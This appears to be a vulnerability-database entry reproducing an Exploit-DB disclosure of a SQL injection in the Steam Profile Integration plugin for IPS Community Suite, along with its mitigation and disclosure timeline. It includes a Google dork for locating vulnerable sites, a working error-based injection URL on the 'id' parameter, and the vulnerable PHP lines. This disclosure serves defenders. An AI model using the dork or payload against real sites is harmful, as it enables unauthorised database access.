IPS Community Suite - Steam Profile Integration 2.0.11 and below SQL injection

vendor:

IPS Community Suite

by:

DrWhat

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: IPS Community Suite

Affected Version From: 2.0.11 and below

Affected Version To: 2.0.11 and below

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows Server 2008 PHP7 & Linux Debian PH5.6

2017

IPS Community Suite – Steam Profile Integration 2.0.11 and below SQL injection

An unauthenticated attacker can inject arbitrary SQL commands into the 'id' parameter of the 'update' action of the 'steamProfile' module of the IPS Community Suite. This is due to the lack of proper sanitization of the 'id' parameter in the 'updateProfile()' function of the 'Update.php' file. This can allow an attacker to gain access to sensitive information from the database.

Mitigation:

Upgrade to IPS Community Suite version 2.0.12 or later.

Source

Exploit-DB raw data:

# Exploit Title: IPS Community Suite - Steam Profile Integration 2.0.11 and below SQL injection
# Google Dork: inurl:tab=node_steam_steamprofile
# Date: 13/03/2017
# Exploit Author: DrWhat
# Vendor Homepage: https://invisionpower.com/files/file/8170-steam-profile-integration/
# Software Link: https://invisionpower.com/files/file/8170-steam-profile-integration/
# Version: 2.0.11 and below
# Tested on: Windows Server 2008 PHP7 & Linux Debian PH5.6

# SQL Injection/Exploit: http://localhost/path/index.php?app=steam&module=steam&section=steamProfile&do=update&id=[USER_WITH_STEAM]%' OR EXTRACTVALUE(1001,CONCAT(0x3A,([QUERY]),0x3A)) AND '%'='&csrfKey=[CSRF_KEY]


# Vulnerable code: /sources/Update/Update.php updateProfile() function
# 532: $ids = array();
# 533: $steamids = '';
# 534: $select = "s.st_member_id,s.st_steamid,s.st_restricted";
# 535: $where = "s.st_steamid>0 AND s.st_restricted!='1'";
# 536: if($single)
# 537: {
# 538:    $where .= " AND s.st_member_id='{$single}'"; // $single is $_GET['id'] pass through the router
# 539:
# 540:    /* Is the member already in the database ? */
# 541:    $s = \IPS\steam\Profile::load($single); // IPS Profile model cleans the request and successfully executes the query


# 573: $query = \IPS\Db::i()->select( $select, array('steam_profiles', 's'), $where, 's.st_member_id ASC', array( $this->extras['profile_offset'], 100), NULL, NULL, '011'); // Our payload is then later executed in the $where variable unsanitized


# Timeline
# 13/03/2017: Exploit discovered
# 13/03/2017: Vendor notified
# 14/03/2017: Vendor confirmed vulnerablity
# 15/03/2017: Vendor releases patch 2.0.12
# 15/03/2017: Public disclosure